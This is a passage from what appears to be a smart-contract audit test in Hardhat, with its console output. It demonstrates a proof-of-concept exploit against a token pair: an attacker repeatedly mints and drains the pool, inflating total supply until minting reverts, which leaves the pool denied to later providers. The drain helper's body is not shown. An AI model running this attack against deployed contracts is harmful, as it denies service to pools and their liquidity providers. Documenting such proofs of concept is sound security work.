            // Call drainPair without initial balances, it will fetch them
            await drainPair(pair, attacker, tokenA, tokenB);
            console.log("  Called drainPair.");

            const pairTokenABalance = await tokenA.balanceOf(pair.address);
            const pairTokenBBalance = await tokenB.balanceOf(pair.address);
            console.log(`  Pair ${await tokenA.symbol()} balance after drain: ${pairTokenABalance.toString()}`);
            console.log(`  Pair ${await tokenB.symbol()} balance after drain: ${pairTokenBBalance.toString()}`);

            // Assertions based on PoC logs (DAI balance: 1, FRAX balance: 2)
            // Token A (e.g. DAI if token0) should be 1
            // Token B (e.g. FRAX if token1) should be 2
            if (tokenA.address === await pair.token0()) {
                expect(pairTokenABalance).to.equal(1, `Cycle ${i+1}: ${await tokenA.symbol()} balance in pair should be 1 after drain`);
                expect(pairTokenBBalance).to.equal(2, `Cycle ${i+1}: ${await tokenB.symbol()} balance in pair should be 2 after drain`);
            } else { // tokenB is token0
                expect(pairTokenBBalance).to.equal(1, `Cycle ${i+1}: ${await tokenB.symbol()} balance in pair should be 1 after drain`);
                expect(pairTokenABalance).to.equal(2, `Cycle ${i+1}: ${await tokenA.symbol()} balance in pair should be 2 after drain`);
            }
        }

        console.log("\nAttempting final mint which should fail...");
        // Last attempt to mint after inflating totalSupply
        await tokenA.connect(attacker).transfer(pair.address, MINT_AMOUNT);
        await tokenB.connect(attacker).transfer(pair.address, MINT_AMOUNT);
        
        await expect(
            pair.connect(attacker).mint(attacker.address)
        ).to.be.reverted; // PoC expects revert, likely due to overflow or ILM with huge totalSupply

        console.log("\nTest finished: Successfully demonstrated vulnerability and final mint reverted.");
    });
}); 

Pair Vulnerability Test (First Liquidity Provider DOS)
Pair Address: 0x0CECE5951F0aa1b0916435405acEC8dB1fD49Ef9
Token0: 0x5FbDB2315678afecb367f032d93F642f64180aa3 (DAI)
Token1: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512 (FRAX)

Cycle 1/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 9999000, Pair TotalSupply: 10000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Cycle 2/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 50000009999000, Pair TotalSupply: 50000010000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Cycle 3/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 250000100000009999000, Pair TotalSupply: 250000100000010000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Cycle 4/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 1250000750000150000009999000, Pair TotalSupply: 1250000750000150000010000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Cycle 5/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 6250005000001500000200000009999000, Pair TotalSupply: 6250005000001500000200000010000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Cycle 6/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 31250031250012500002500000250000009999000, Pair TotalSupply: 31250031250012500002500000250000010000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Cycle 7/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 156250187500093750025000003750000300000009999000, Pair TotalSupply: 156250187500093750025000003750000300000010000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Cycle 8/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 781251093750656250218750043750005250000350000009999000, Pair TotalSupply: 781251093750656250218750043750005250000350000010000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Cycle 9/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 3906256250004375001750000437500070000007000000400000009999000, Pair TotalSupply: 3906256250004375001750000437500070000007000000400000010000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Cycle 10/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 19531285156278125013125003937500787500105000009000000450000009999000, Pair TotalSupply: 19531285156278125013125003937500787500105000009000000450000010000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Cycle 11/11
  Transferred 10000000 of DAI and FRAX to pair.
  Minted LP. Attacker LP Balance: 97656445312675781343750032812507875001312500150000011250000500000009999000, Pair TotalSupply: 97656445312675781343750032812507875001312500150000011250000500000010000000
  Called drainPair.
  Pair DAI balance after drain: 1
  Pair FRAX balance after drain: 2

Attempting final mint which should fail...

Test finished: Successfully demonstrated vulnerability and final mint reverted.
    ✔ should demonstrate the K value vulnerability leading to DOS (1262ms)